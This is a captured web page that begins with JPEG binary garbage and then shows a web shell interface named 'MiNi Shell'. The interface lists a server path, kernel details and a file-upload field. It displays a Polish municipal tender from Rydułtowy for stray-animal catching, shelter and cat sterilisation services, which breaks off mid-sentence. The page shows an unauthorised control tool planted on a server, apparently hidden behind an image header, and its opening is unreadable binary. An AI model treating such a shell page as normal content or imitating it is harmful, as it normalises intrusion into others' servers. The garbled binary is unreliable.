JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221021/0040481001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Realizacja części zadań programu opieki nad zwierzętami bezdomnymi i zapobiegania bezdomności zwierząt na terenie miasta Rydułtowy oraz wyłapywanie i transport zwierząt wolno żyjących poszkodowanych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Rydułtowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ofiar Terroru 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rydułtowy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-280</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@rydultowy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rydultowy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja części zadań programu opieki nad zwierzętami bezdomnymi i zapobiegania bezdomności zwierząt na terenie miasta Rydułtowy oraz wyłapywanie i transport zwierząt wolno żyjących poszkodowanych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd7b64f7-5127-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00404810</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00015788/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.22 Realizacja części zadań programu opieki nad zwierzętami bezdomnymi oraz zapobiegania bezdomności zwierząt na terenie miasta Rydułtowy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rydultowy <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/rydultowy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji<br/>elektronicznej. 2. Komunikacja w postępowaniu odbywa się elektronicznie za pośrednictwem platformy (portalu)<br/>https://platformazakupowa.pl/pn/rydultowy i formularza &#34;Wyślij wiadomość&#34;. W korespondencji należy<br/>posługiwać się znakiem sprawy względnie ID postępowania.<br/>3. Korzystanie z serwisu (platformy) wymaga zapoznania się Regulaminem dla Użytkowników (Wykonawców) dostępnego na portal_<br/>https://platformazakupowa.pl/pn/rydultowy.<br/>4. Minimalne wymagania techniczne umożliwiające korzystanie ze strony platformazakupowa.pl to przeglądarka internetowa Internet<br/>Explorer, Chrome i FireFox w najnowszej dostępnej wersji, z<br/>włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości, co najmniej 256<br/>kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej<br/>rozdzielczości ekranu 1024x768 pikseli. Szyfrowanie danych odbywa się przy pomocy protokołu SSL.5. Kodowanie i czas: Plik<br/>załączony i zapisany przez Wykonawcę na platformie nie jest widoczny dla<br/>Zamawiającego, gdyż jest przechowywany na osobnym szyfrującym serwerze i zaszyfrowany. Możliwość pobrania plików przez<br/>Zamawiającego następuje po upłynięciu terminu otwarcia ofert oraz<br/>ich odszyfrowaniu w systemie. Oznaczenie czasu odbioru danych przez platformę stanowi przypiętą do<br/>oferty elektronicznej datę oraz dokładny czas (hh:mm:ss), znajdujące się w kolumnie dotyczącej<br/>danej oferty, w sekcji - &#34;Data złożenia oferty&#34;.<br/>6. Komunikacja przez &#34;Wyślij wiadomość&#34; umożliwia dodanie do treści wysyłanej wiadomości plików<br/>lub spakowanego katalogu (załączników). Występuje limit objętości plików lub spakowanego katalogu<br/>w zakresie całej wiadomości do 1 GB przy maksymalnej ilości 20 plików lub spakowanych katalogów.<br/>Zamawiający, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript, 5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3. 7) Oznaczenie czasu odbioru danych przez<br/>platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Ofertę składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Szczegółowy opis został zawarty w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) administratorem Pani/Pana danych osobowych jest:<br/>Burmistrz Miasta Rydułtowy z siedzibą w urzędzie miasta przy ul. Ofiar Terroru 36, 44-280 Rydułtowy. tel.: (032) 4537411, e-mail: um@rydultowy.pl, adres internetowy: Ogłoszenie nr 2022/BZP 00233521 z dnia 2022-06-30 2022-06-30<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275<br/>pkt 1 ustawy - Usługi www.rydultowy.pl, 2 inspektor ochrony danych osobowych jest dostępny pod numerem (032 4537480) oraz pod<br/>adresem e-mailowym iod@rydultowy.pl,3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z przedmiotowym postępowaniem.4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust.1 ustawy Pzp, 5) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy, 6) obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy, 7)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposóbzautomatyzowany,<br/>stosowanie do art. 22 RODO; 8) posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących; W przypadku gdy wykonanie obowiązków, o których mowa w art.15 ust. 1-3 rozporządzenia RODO,wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub postępowania o udzielenie zamówienia publicznego,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą umowy w zakresie<br/>niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników, c) na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO;Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego, W przypadku gdy wniesienie żądania dotyczącego prawa, o<br/>którym mowa w art. 18 ust. 1 rozporządzenia RODO, spowoduje ograniczenie przetwarzania danych osobowych zawartych w<br/>protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia RODO.<br/>Udostępnianie, o którym mowa powyżej, ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa<br/>w art. 9 ust. 1 rozporządzenia RODO, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o<br/>których mowa w ust.3 i art. 18 ust. 3-6, stosuje się odpowiednio, d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9) nie<br/>przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO, c) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Paa danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia RODO, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia RODO, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BP.271.00030.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie obejmuje wyłapywanie i przewożenie bezdomnych zwierząt z terenu miasta Rydułtowy do schroniska własnym transportem i na własny koszt każdorazowo od świtu do zmierzchu i całodobowo w przypadku pogryzień na zgłoszenie Zamawiającego i Straży Miejskiej.<br/> 2. Wykonawca zobowiązany jest do realizacji zadania niezwłocznie, lecz nie później niż 3 godziny od przyjęcia zgłoszenia. Złapane w wyniku interwencji zwierzęta przed przewiezieniem do schroniska przetrzymywane będą w Zakładzie Gospodarki Komunalnej w Rydułtowach.<br/> 3. Wykonawca zobowiązany jest do realizacji zadania, o którym mowa w ust.1 przy zachowaniu następujących warunków:<br/> 1) przyjęcie bezdomnych zwierząt odłowionych z terenu Miasta Rydułtowy, a znajdujących się pod opieką schroniska w Rybniku, które dotychczas świadczyło dla Miasta usługę w tym zakresie (ok. 10 sztuk),<br/> 2) odławianie bezdomnych zwierząt przy użyciu sprzętu do tego celu przystosowanego, umożliwiającego bezpieczne i humanitarne, jak najmniej uciążliwe dla zwierząt wykonanie tej czynności, w szczególności: smycze, chwytaki, siatki, klatki pułapki,<br/> 3) bezdomne zwierzęta po wyłapaniu powinny zostać niezwłocznie przewiezione do schroniska, <br/> 4) przewóz wyłapanych zwierząt do schroniska przy użyciu środków transportu dostosowanych do danego gatunku i przedziału wiekowego zwierząt, a czynność ich transportu należy zorganizować w taki sposób, aby nie powodować zranienia lub zbędnego cierpienia żadnego zwierzęcia, <br/> 5) przyjęcie i przetrzymywanie bezdomnych zwierząt z terenu miasta w schronisku, <br/> 6) sprawowanie bieżącej opieki nad bezdomnymi zwierzętami z terenu miasta znajdującymi się w schronisku przy zapewnieniu im godnych i humanitarnych warunków, w tym codziennej opieki i pielęgnacji obejmującej w szczególności: bieżące usuwanie wszelkich nieczystości<br/>z pomieszczeń, zapewnienie zwierzętom ochrony przed zimnem lub upałem, karmienie zwierząt zgodnie z zaleceniami lekarza weterynarii, pojenie zwierząt, w szczególności poprzez zapewnienie im stałego dostępu do świeżej wody pitnej; zapewnienie zwierzętom możliwości wychodzenia na spacery, dostosowanej do ich potrzeb i stanu zdrowia, <br/> 7) przeprowadzenie kwarantanny dla nowo przybyłych zwierząt wg wskazań lekarza weterynarii,<br/> 8) zapewnienie co najmniej jednej osoby do stałego nadzoru i opieki nad przetrzymywanymi zwierzętami,<br/> 9) zapewnienie niezbędnej opieki weterynaryjnej przetrzymywanym zwierzętom, w tym zapewnienie możliwości podjęcia przez lekarza weterynarii w każdym czasie czynności w szczególności w sytuacji zagrożenia życia i zdrowia zwierząt, <br/> 10) podanie środków farmaceutycznych w celu usunięcia pasożytów wewnętrznych i zewnętrznych, szczepionek,<br/> 11) wykonanie zabiegu sterylizacji albo kastracji bezdomnych zwierząt odławianych na terenie miasta, z wyjątkiem zwierząt, u których istnieją przeciwwskazania do wykonania tych zabiegów, z uwagi na ich stan zdrowia lub wiek,<br/> 12) humanitarne uśmiercanie zwierząt w sposób polegający na zadaniu przy tym minimum cierpienia fizycznego i psychicznego w uzasadnionych przypadkach wynikających z przepisów prawa, <br/> 13) utylizację padłych zwierząt przebywających w schronisku oraz padłych w trakcie interwencji,<br/> 14) prowadzenie ewidencji przyjmowanych zwierząt z terenu miasta, zwierząt padłych, poddanych uśpieniu, przekazanych do adopcji oraz udostępnianie tej ewidencji na każde żądanie Zamawiającego, <br/> 15) podjęcie aktywnych działań w celu poszukiwania właścicieli dla bezdomnych zwierząt<br/>i oddawania ich do adopcji, poprzez zamieszczenie informacji na stronie internetowej schroniska lub na portalu społecznościowym, w terminie nie dłuższym niż 30 dni od dnia przyjęcia zwierzęcia do schroniska,<br/> 16) współpraca z osobami lub grupą osób chętnych do wyprowadzania psów na spacery, <br/> 17) sporządzanie sprawozdań z wykonanych zabiegów za dany miesiąc w terminie do 15 dni od zakończenia danego miesiąca oraz sprawozdań rocznych z realizacji zadania w terminie do 30 dni od zakończenia danego roku. <br/> 4. Zestawienie zwierząt odebranych z terenu Miasta Rydułtowy w latach 2019-2021 stanowi załącznik nr 7 do SWZ.<br/> 18) Zamawiający dopuszcza zamiast złożenia sprawozdania z wykonania zabiegów za dany miesiąc - przedłożenie wydruku wykazu zwierząt przebywających w schronisku, sporządzonego zgodnie z obowiązującymi przepisami prawa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98380000-0 - Usługi psiarni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77500000-5 - Usługi hodowli zwierząt</p> <p class="mb-0">85200000-1 - Usługi weterynaryjne</p> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Szczegółowy opis kryteriów znajduje się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji (czas wyłapania bezdomnego zwierzęcia od momentu otrzymania zgłoszenia)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja przez Wykonawcę zadania własnego gminy na podstawie art. 11 a ust.2 pkt 2 ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt t.j. opieki nad wolno żyjącymi kotami w zakresie sterylizacji i kastracji wolno żyjących kotów. <br/> 2. Realizacja przedmiotu zamówienia obejmuje:<br/> 1) ocenę stanu zdrowia zwierzęcia, która stanowi podstawę dopuszczenia do wykonania właściwego zabiegu,<br/> 2) przeprowadzenie zabiegu sterylizacji lub kastracji kota,<br/> 3) oznakowanie zwierzęcia pod narkozą poprzez niewielkie odcięcie końcówki ucha,<br/> 4) zapewnienie właściwej opieki weterynaryjnej po zabiegu w zależności od stanu zdrowia zwierzęcia (pobyt w zakładzie leczniczym dla zwierząt minimum 5 dni w przypadku kotek oraz 2 dni w przypadku kocurów), przy czym stan zdrowia kota po zabiegu musi umożliwiać mu przeżycie na wolności bez dodatkowej pomocy i opieki ze strony człowieka,<br/> 5) zapewnienie zwierzętom godnych i humanitarnych warunków, w tym codziennej opieki<br/>i pielęgnacji,<br/> 6) usunięcie szwów po zagojeniu się rany w przypadku używania nierozpuszczanych nici, <br/> 7) uśpieniu i utylizacji płodów, w przypadku wykonania zabiegu u ciężarnej kotki,<br/> 8) w przypadku konieczności, w celu zakończenia cierpień zwierzęcia bezzwłoczne uśmiercenie<br/>i przyjęcie zwłok.<br/> 4. Usługi, o których mowa w ust. 2, będą świadczone przez Wykonawcę na podstawie zleceń dokonywanych przez pracownika Zamawiającego.<br/> 5. Koty będą dostarczane po uprzednim osobistym lub telefonicznym uzgodnieniu<br/>z Wykonawcą terminu zabiegu.<br/> 6. Koty będą dostarczane do siedziby Wykonawcy przez opiekuna społecznego legitymującego się dowodem osobistym i pisemną zgodą Zamawiającego na przeprowadzenie zabiegu lub pracownika Straży Miejskiej. Koty we własnym zakresie są odbierane przez opiekuna społecznego wskazanego przez Zamawiającego lub pracownika Straży Miejskiej.<br/> 7. Po wykonanym zabiegu i przebytym okresie rekonwalescencji (powrotu wszystkich czynności fizjologicznych do normy) Wykonawca informuje Zamawiającego (w tym opiekuna społecznego) o możliwości odbioru zwierzęcia telefonicznie lub za pomocą środków komunikacji elektronicznej: 